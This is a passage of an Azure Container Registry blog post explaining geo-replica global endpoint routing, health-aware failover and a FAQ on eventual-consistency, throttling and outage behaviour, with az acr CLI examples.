class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;False&lt;/SPAN&gt;
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Requests to &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; no longer route to West US. The replica still receives replicated content — and continues to replicate its own content out to other replicas — and storage quota and per-replica costs continue to accrue. If regional endpoints are enabled, the West US regional endpoint URL also continues to work; &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; controls only the replica's participation in &lt;STRONG&gt;global&lt;/STRONG&gt; endpoint routing.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;A note on naming.&lt;/STRONG&gt; The CLI flag &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; (on &lt;CODE&gt;az acr replication update&lt;/CODE&gt;) and the &lt;STRONG&gt;regional endpoints&lt;/STRONG&gt; feature (enabled via &lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt;) are two different things despite the similar names. &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; controls whether a replica participates in &lt;STRONG&gt;global&lt;/STRONG&gt; endpoint routing. The &lt;STRONG&gt;regional endpoints&lt;/STRONG&gt; feature creates per-region URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) that bypass the global endpoint entirely. They are independent controls.&lt;/P&gt;
&lt;P&gt;In Azure CLI 2.86.0 and later, the old &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; flag has been renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;. The old flag name is deprecated and will be removed in Azure CLI 2.87.0 (June 2026). If you have existing scripts or automation that use &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt;, update them to use &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;CLI flags quick reference:&lt;/STRONG&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Flag&lt;/th&gt;&lt;th&gt;Scope&lt;/th&gt;&lt;th&gt;Purpose&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--regional-endpoints&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Registry-level (&lt;CODE&gt;az acr create&lt;/CODE&gt; or &lt;CODE&gt;az acr update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Enables dedicated regional endpoint URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) for &lt;STRONG&gt;all&lt;/STRONG&gt; geo-replicas.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Per-geo-replica (&lt;CODE&gt;az acr replication create&lt;/CODE&gt; or &lt;CODE&gt;az acr replication update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Controls whether the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; routes traffic to a specific geo-replica. Set to &lt;CODE&gt;false&lt;/CODE&gt; to temporarily exclude a geo-replica from global routing.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--data-endpoint-enabled&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Registry-level (&lt;CODE&gt;az acr create&lt;/CODE&gt; or &lt;CODE&gt;az acr update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Enables dedicated data endpoints (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;) for layer blob downloads. Auto-enabled when at least one private endpoint is configured.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;This bidirectional sync during disable is intentional. When you re-enable the replica, every image pushed to the registry while the replica was disabled — from any region — is already present, so the replica can serve traffic immediately with no catch-up window. If we stopped syncing on disable, re-enabling would leave the replica with stale data and force a long catch-up before it could safely serve pulls.&lt;/P&gt;
&lt;H3 id="step-4-re-enable-the-replica-to-participate-in-global-endpoint-routing"&gt;Step 4: Re-enable the replica to participate in global endpoint routing&lt;/H3&gt;
&lt;P&gt;Re-enable the replica:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true
"&gt;&lt;CODE&gt;az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;PRE&gt;&lt;CODE&gt;&lt;SPAN class="hljs-comment"&gt;NAME&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;LOCATION&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;PROVISIONING&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;STATE&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;STATUS&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;REGION&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENDPOINT&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENABLED&lt;/SPAN&gt;
&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;There is no cooldown. The global endpoint resumes routing requests to the West US replica as soon as the change takes effect on ACR's side. Because data continued syncing while the replica was disabled (Step 3), the replica is immediately ready to serve pulls — no catch-up window.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note on DNS during disable/enable.&lt;/STRONG&gt; When you take a replica out of global routing, ACR purges its own DNS records for that replica from the global endpoint on a fast path — there is no waiting on a published TTL on ACR's side. If clients run their own DNS cache for the global endpoint, however, those clients will keep resolving to the disabled replica until the client cache expires. We can't control client-side caches. &lt;STRONG&gt;The recommendation: do not run a long-lived DNS cache for the global endpoint.&lt;/STRONG&gt; A short-lived DNS pin for the duration of a single push (covered in the DNS and Client-Side Considerations section) is fine and even helpful — but a long-lived DNS cache will make&amp;nbsp;&lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt; look broken from the client's perspective.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="step-5-what-to-expect-when-health-aware-failover-triggers"&gt;Step 5: What to expect when health-aware failover triggers&lt;/H3&gt;
&lt;P&gt;Health-aware failover is automatic. ACR evaluates registry health on a per-registry basis, and when a registry in a region can't reliably serve requests, the global endpoint reroutes that registry's traffic to a healthy replica. There is no customer-invocable trigger — that's the point.&lt;/P&gt;
&lt;P&gt;End-to-end timing is on the order of minutes — fast enough to catch real regional degradation, slow enough to ride out transient errors that resolve on their own. DNS TTL may add additional propagation delay before all clients switch to the new region.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Scope of health-aware failover.&lt;/STRONG&gt; Health-aware failover applies only to operations against the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; — the registry API calls (auth, get manifest, get tag, get referrers, get blob location). It evaluates health when those API calls come in; it does &lt;STRONG&gt;not&lt;/STRONG&gt; trigger mid-operation. Two important consequences:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints are not in scope.&lt;/STRONG&gt; When you talk to a regional endpoint like &lt;CODE&gt;myregistry.westus.geo.azurecr.io&lt;/CODE&gt;, you're talking to that one replica. There is no automatic reroute. If you've pinned a workload to a regional endpoint and that region degrades, you implement client-side failover by switching the workload to a different regional endpoint.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Dedicated data endpoints are not in scope.&lt;/STRONG&gt; Once a registry endpoint has redirected you to a dedicated data endpoint, you stay on that region's data endpoint for the duration of the layer download. There is no automatic reroute of an in-flight blob download. The region targeted by the redirect is decided up front by whichever registry endpoint served the blob-location call: the global endpoint chooses based on its per-registry health evaluation, and a regional endpoint always targets its own region.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The signals you can use to confirm a failover is in progress:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Check replication status
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Check replication status
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;You can also check &lt;STRONG&gt;Resource Health&lt;/STRONG&gt; for the registry in the Azure portal — navigate to your registry and select &lt;STRONG&gt;Resource health&lt;/STRONG&gt; under the &lt;STRONG&gt;Help&lt;/STRONG&gt; section to see platform-side degradation signals.&lt;/P&gt;
&lt;P&gt;You'll typically see:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Increased pull latency&lt;/STRONG&gt; as traffic shifts to a more distant replica&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; flagging known issues in the affected region&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Replication status&lt;/STRONG&gt; indicating which replicas are online&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;After the region recovers, the per-registry health evaluation marks it healthy again and the global endpoint resumes routing — automatic, no cooldown, no customer action. Note that health is evaluated &lt;STRONG&gt;per registry&lt;/STRONG&gt;, not per region: if a degradation affects only a subset of registries in a region, only those registries are rerouted, and other registries in the same region continue to be served locally with no unnecessary latency penalty.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Not triggered by throttling.&lt;/STRONG&gt; Health-aware failover is DNS-based and responds to regional ACR service health and Azure infrastructure health. It does &lt;STRONG&gt;not&lt;/STRONG&gt; reroute traffic based on HTTP 429 (throttling) responses. If a geo-replica is throttling your requests but the region's infrastructure is healthy, the global endpoint continues routing you to that geo-replica. To manage throttling, use regional endpoints to spread workloads across multiple geo-replicas for better capacity distribution.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note on long-running pushes during a failover.&lt;/STRONG&gt; A multi-layer push that spans a failover boundary can land layers and the manifest on different replicas — exactly the failure mode that DNS bouncing produces during a single push. ACR is actively tightening health-aware failover behavior to minimize cross-replica scatter during these scenarios, and the recommendation today remains: pin pushes to a single replica via a regional endpoint when push/pull consistency matters.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="common-questions"&gt;Common Questions&lt;/H2&gt;
&lt;H3 id="q1-performance-impact-during-initial-replica-creation-on-a-live-registry"&gt;Q1. Performance impact during initial replica creation on a live registry&lt;/H3&gt;
&lt;P&gt;Because ACR is multi-region, multi-write, the existing replica continues serving pull and push traffic throughout the period when a new replica is being seeded. Replication is asynchronous and content propagates in the background; the time to populate a new geo-replica scales with the &lt;STRONG&gt;size of the registry&lt;/STRONG&gt; — the cumulative number and total size of images already in the registry — not with any single image. The docs do not publish a quantified degradation percentage or a throttling window for this period, and they do not promise zero performance impact — the safe operating assumption for a live production registry is that existing replicas continue serving traffic normally, with the new replica catching up in the background.&lt;/P&gt;
&lt;H3 id="q2-restricted-updating-state-during-initial-sync"&gt;Q2. Restricted/updating state during initial sync&lt;/H3&gt;
&lt;P&gt;There is no "restricted" state for the registry during normal replica creation. Writes, control-plane operations, and pushes/pulls against existing replicas continue normally. The only time configuration changes are unavailable is during a home region outage — see the relevant FAQ item later on for the full data-plane-versus-control-plane breakdown.&lt;/P&gt;
&lt;H3 id="q3-cooldown-periods-and-non-straightforward-failback-scenarios"&gt;Q3. Cooldown periods and non-straightforward failback scenarios&lt;/H3&gt;
&lt;P&gt;There is no cooldown before failback, manual or automatic. Re-enabling a replica's participation in global endpoint routing takes effect immediately on ACR's side. Health-aware failover returns traffic to a region as soon as its per-registry health evaluation passes again.&lt;/P&gt;
&lt;P&gt;The failback case that is &lt;STRONG&gt;not&lt;/STRONG&gt; seamless: if a recently pushed image has not yet replicated to the failover region, a pull from that region may not find the image until replication catches up. This is a function of eventual consistency, not failback timing — and it's part of a broader class of issues we cover in Q4.&lt;/P&gt;
&lt;H3 id="q4-common-pull-and-push-failure-modes-during-the-eventual-consistency-window"&gt;Q4. Common pull and push failure modes during the eventual-consistency window&lt;/H3&gt;
&lt;P&gt;DNS bouncing during a single push is one well-known problem, but it isn't the only one. The eventual-consistency window between geo-replicas surfaces in several recurring failure modes worth knowing about:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Push-then-immediate-pull-cross-region.&lt;/STRONG&gt; Pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt; to one region and immediately pulling it from a different region can fail with &lt;CODE&gt;manifest unknown&lt;/CODE&gt; until replication catches up. This shows up most painfully in CI/CD pipelines where one CI runner pushes an image and thousands of pods across other regions all try to pull from their local geo-replicas at the same time. Today, customers work around this with indeterminate sleeps before scheduling expensive compute, or with retry logic, or by waiting on a replication-complete signal — none of which is a clean planning story.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Tag overwrite races.&lt;/STRONG&gt; Pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt;, then re-pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt; shortly after with a fix (same tag, different digest), can leave different replicas resolving the same tag to different digests during the eventual-consistency window.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Delete propagation.&lt;/STRONG&gt; Deleting a tag or repository in one region takes some time to propagate to other replicas. Pulls from regions where the delete hasn't yet propagated can return the supposedly-deleted content.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Mid-push failover scatter.&lt;/STRONG&gt; A multi-layer push that spans a health-aware failover boundary or a DNS bouncing event can land layers on one replica and the manifest on another, surfacing as manifest validation errors or &lt;CODE&gt;blob unknown&lt;/CODE&gt; on subsequent pulls.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;&lt;STRONG&gt;What ACR is doing about this.&lt;/STRONG&gt; We're working on &lt;STRONG&gt;bounded staleness consistency&lt;/STRONG&gt; for pushed images across all geo-replicas worldwide, which addresses these four failure modes directly. This will be covered in an upcoming blog post. If you're hitting eventual-consistency brittleness today and want to talk through your scenario, reach out to us on the &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; — we want the customer signal to land in the design.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Mitigations available today:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Pin pushes to a single replica via a regional endpoint.&lt;/STRONG&gt; Every sub-request in the push — login, blob uploads, manifest upload — goes to the same replica, eliminating the DNS bouncing and mid-push scatter classes entirely.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Use a short-lived client-side DNS cache like &lt;CODE&gt;dnsmasq&lt;/CODE&gt;&lt;/STRONG&gt; scoped to the duration of a single push, only when you're not using regional endpoints. Do not run a long-lived DNS cache for the global endpoint — it interferes with &lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt; and with health-aware failover routing.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Build retry logic into pulls that immediately follow a cross-region push.&lt;/STRONG&gt; Either retry with backoff or check replication status with &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-webhook" target="_blank" rel="noopener"&gt;ACR webhooks&lt;/A&gt; before pulling. ACR can detect and notify you when an image or tag is available for pull in a geo-replica (say geo-replica B), after it has been pushed to another geo-replica (geo-replica A) and background replication has succeeded to geo-replica B.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Design publish steps to be idempotent&lt;/STRONG&gt; so retries triggered by mid-push failover are safe.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="q5-auth-behavior-across-endpoint-switches"&gt;Q5. Auth behavior across endpoint switches&lt;/H3&gt;
&lt;P&gt;For safety, treat each global endpoint and each regional endpoint as its own authenticated surface. All registry APIs except the actual blob downloads (auth, manifests, tag resolution, referrers) flow through whichever endpoint you've chosen. &lt;STRONG&gt;If you switch from the global endpoint to a regional endpoint, or from one regional endpoint to another, re-authenticate.&lt;/STRONG&gt; That means &lt;CODE&gt;az acr login&lt;/CODE&gt;, fresh SDK auth, or — for AKS — letting the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/aks/cluster-container-registry-integration" target="_blank" rel="noopener"&gt;Kubernetes ACR credential provider&lt;/A&gt; handle re-auth, which it does automatically when the endpoint changes.&lt;/P&gt;
&lt;H3 id="q6-throttling-under-failover-and-pinning"&gt;Q6. Throttling under failover and pinning&lt;/H3&gt;
&lt;P&gt;Throttling limits on registry API operations are &lt;STRONG&gt;per-replica&lt;/STRONG&gt;, not per-registry. This has two operational implications:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;During health-aware failover&lt;/STRONG&gt;, traffic that was spread across replicas can shift heavily onto whichever replicas remain in the global endpoint's routing pool. Capacity plan to spread traffic across &lt;STRONG&gt;two or three&lt;/STRONG&gt; healthy replicas during a failover scenario rather than concentrating onto one — the global endpoint's routing already does this for you when multiple healthy replicas exist, but registries with only two regions configured can hit per-replica limits more easily during a failover. To mitigate, use regional endpoints to spread workloads across multiple geo-replicas and plan per-replica capacity.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;When pinning via regional endpoints (Step 2a)&lt;/STRONG&gt;, you concentrate traffic on whichever replica you've pinned to. If you've pinned all your AKS clusters to a single regional endpoint, you may hit that replica's per-region throttling limits at peak. Mitigations: pin different workloads to different regional endpoints across multiple regions for better topology mapping and capacity distribution, or use the global endpoint (Step 2b) for workloads where you don't need explicit pinning so ACR's routing can spread load. We're also working on improving the throttling metrics surfaced during health-aware failover events.&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; &lt;STRONG&gt;Health-aware failover does not reroute traffic based on HTTP 429 (throttling).&lt;/STRONG&gt; If you're experiencing throttling but the region's infrastructure is healthy, the global endpoint continues routing you there. Use regional endpoints to explicitly spread load across replicas for capacity planning.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="q7-home-region-outage-scope"&gt;Q7. Home region outage scope&lt;/H3&gt;
&lt;P&gt;Geo-replication provides high availability for the &lt;STRONG&gt;data plane&lt;/STRONG&gt;. During a home region outage, the &lt;STRONG&gt;control plane&lt;/STRONG&gt; is unavailable, which means you can't create or delete replicas, modify network rules, or change replication settings until the home region recovers. &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-tasks-overview" target="_blank" rel="noopener"&gt;ACR Tasks&lt;/A&gt; are also bound to the home region and don't run while it's unavailable. The data plane keeps working:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Global endpoint&lt;/STRONG&gt; continues routing pulls and pushes to healthy replicas.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt; continue working — you talk directly to specific replicas, and your client-side logic decides which region to use.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Authentication, manifests, blob downloads, webhooks&lt;/STRONG&gt; continue functioning through any healthy replica.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The home region of a registry is fixed at creation and cannot be changed afterward. Microsoft's &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/relocation/relocation-container-registry" target="_blank" rel="noopener"&gt;registry relocation guidance&lt;/A&gt; describes a redeployment procedure — creating a new registry in a different region — not an in-place change to an existing registry's home region.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; If your registry uses a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/tutorial-enable-customer-managed-keys" target="_blank" rel="noopener"&gt;customer-managed key&lt;/A&gt;, review the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/key-vault/general/disaster-recovery-guidance" target="_blank" rel="noopener"&gt;key vault failover and redundancy guidance&lt;/A&gt; for maximum resilience. Key vault availability directly affects the registry's ability to encrypt and decrypt data.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="q8-webhooks-during-failover"&gt;Q8. Webhooks during failover&lt;/H3&gt;
&lt;P&gt;Webhooks fire from the replica that received the push. Because ACR also replicates content to other geo-replicas, webhooks fire from each geo-replica as the image syncs to it — so a single push results in webhook events from the receiving replica plus an event from each replica as replication completes. During a failover where pushes are routed to a different region, webhooks from those pushes fire from the new region; once the original region recovers and replication catches up, webhook events fire from there too. Webhook consumers should be designed to handle multiple events per pushed image and deduplicate as needed.&lt;/P&gt;
&lt;H3 id="q9-private-endpoints-with-regional-endpoints-and-dedicated-data-endpoints"&gt;Q9. Private endpoints with regional endpoints and dedicated data endpoints&lt;/H3&gt;
&lt;P&gt;When a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;private endpoint&lt;/A&gt; is created against a registry, the private endpoint covers &lt;STRONG&gt;all&lt;/STRONG&gt; of the registry's endpoint surfaces — the global endpoint, every regional endpoint (if regional endpoints are enabled), and every regional dedicated data endpoint. A single private endpoint in one VNet can reach the global endpoint (which routes you to a suitable replica), any regional endpoint in the same or a different region, and any region's dedicated data endpoint for blob downloads.&lt;/P&gt;
&lt;P&gt;The trade-off is private IP allocation: each endpoint surface consumes IPs in the VNet. With many replicas plus regional endpoints plus dedicated data endpoints all enabled, private endpoint creation can fail if the VNet runs out of available private IPs.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;IP address consumption per feature:&lt;/STRONG&gt;&lt;/P&gt;
